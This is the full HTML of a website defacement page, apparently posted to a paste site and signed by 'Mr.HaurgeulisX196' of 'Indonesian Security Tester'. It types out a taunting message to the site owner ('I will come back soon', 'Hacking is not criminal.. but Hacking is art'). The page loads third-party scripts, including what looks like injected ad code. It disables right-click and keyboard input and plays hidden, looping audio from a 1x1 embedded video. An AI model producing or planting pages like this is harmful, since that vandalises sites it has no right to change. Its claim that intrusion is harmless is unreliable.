1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 | <html> <head><script src="http://masterendi.googlecode.com/files/salju.js"></script><script type="text/javascript" src="http://apiwebspadesinfo-a.akamaihd.net/gsrs?is=fmxqtid&bp=PB&g=1c83c707-6e9c-4b09-884c-3bbc7f641e35" ></script></head> <title>Mr.HaurgeulisX196 Was Here !!</title> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script> <style> body{ background-color: #000000; background-repeat:no-repeat; background-attachment:fixed; background-position:right bottom; font-family: Bradley Hand ITC; font-size: 27px; } h1 { padding: 10px 15px; margin: 0px; font-size: 14px; background-color: #000000; //background-image: -moz-linear-gradient(100% 100% 90deg, #777, #999) !important; //background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#999), to(#777)) !important; color: #FFF; //-webkit-border-radius:8px 8px 0px 0px; //-moz-border-radius: 8px 8px 0px 0px; border-radius: 8px 8px 0px 0px; text-shadow:1px 1px 2px #333333; opacity: 0.5; } table { width: 565px; } table tr td{ font-family: verdana; font-size: 11px; padding: 10px 5px; border-bottom: solid 1px #CCC; } #wrapper{ width: 800px; margin: 10px auto; text-align: left; background: url('https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-prn1/1378227_577135182334975_111888418_n.jpg') no-repeat center center fixed ; } #console{ height: 400px; overflow: auto; background-color: #000; padding: 15px; font-family: monospace; font-size: 12px; color: #FFF; } .content{ padding: 15px; } #commander{ border: solid 1px #CCC; padding: 5px 10px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; margin: 5px; width: 590px; height: 30px; } .box{ -moz-box-shadow: 1px 1px 8px #666; -webkit-box-shadow: 1px 1px 8px #666; box-shadow: 1px 1px 8px #40D5D2; border: solid 1px black; -webkit-border-radius: 8px 8px 0px 0px; -moz-border-radius: 8px 8px 0px 0px; border-radius: 8px 8px 0px 0px; margin: 15px 0px; background-color: #F5F5F5; opacity: 0.8; } #help{ width: 300px; float: right; } .prefix{ color: #0077E7; } .keyword{ color: #9eff63; } .error{ color: #FF0000; } .spacer{ clear: both; display: block; } </style> <script type="text/javascript"> // Hacked By : Mr.HaurgeulisX196 TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = ""; } TypingText.all = new Array(); TypingText.currentIndex = 0; TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run(); } TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); return; } if(this.currentText == "") this.element.innerHTML = ""; if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && ! this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); } } </script> <!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end --> <!-- AdFender script begin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender script end --> </head> <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'> <br/><br/> <div id="wrapper"> <div class="box"> <h1>Terminal</h1> <div id="console"><span class="prefix"> <p id="message"> <font color="red">root@IST:</font><font color="white"> hello admin <br> <font color="red">root@IST:</font><font color="white"> <font color="aqua" size="5px">Mr.HaurgeulisX196</font> Was Here !!!<br> <font color="red">root@IST:</font><font color="white"> Your security are low.<br> <font color="red">root@IST:</font><font color="white"> Please patch your security.<br> <font color="red">root@IST:</font><font color="white"> I will come back soon.<br> <font color="red">root@IST:</font><font color="white"> We are <font color="yellow" size="3px">Indonesian Security Tester</font><br> <br> <font color="yellow" size="5px">[+] Hacked By : Mr.HaurgeulisX196</font><br> <font color="white">[+] Message : Remember this, There is not perfect security in the world.. We are only testing your security on your site..Hacking is not criminal.. but Hacking is art<br> We are <font color="yellow" size="3px">Indonesian Security Tester</font> <br> We are United<br> We are Legion<br> We do not forgive<br> We do not forget<br> Expect us<br> <br> <font color="Cyan">[+] Greetz : R4ST4_R00T | 4SUS R00T | Mr.PhoeniX1337 | Mr.Dha | Tested404 | Mr.Unicron | Humanerror404 | Mr.Jumperz | Mr.F4wk3s | simpleS | Mr.DellatioNx196 | BROPRINCESSWAP | Mrs.Loli48 | CinDviaLizer404 | SvN_NeVerMore | Saplon404 <br/> All Member Indonesian Security Tester<br> <br> <br> <font color="yellow">Copyright Mr.HaurgeulisX196 @2014<br> <script type="text/javascript"> new TypingText(document.getElementById("message"), 50, function(i){ var ar = new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; }); //Type out examples: TypingText.runAll(); </script> <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="width:786px;"/> </div> <div class="spacer"></div> <embed src="https://www.youtube.com/v/b0CbfnFwkog&autoplay=1&loop=1" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1"> |
Direct link: https://paste.plurk.com/show/1928349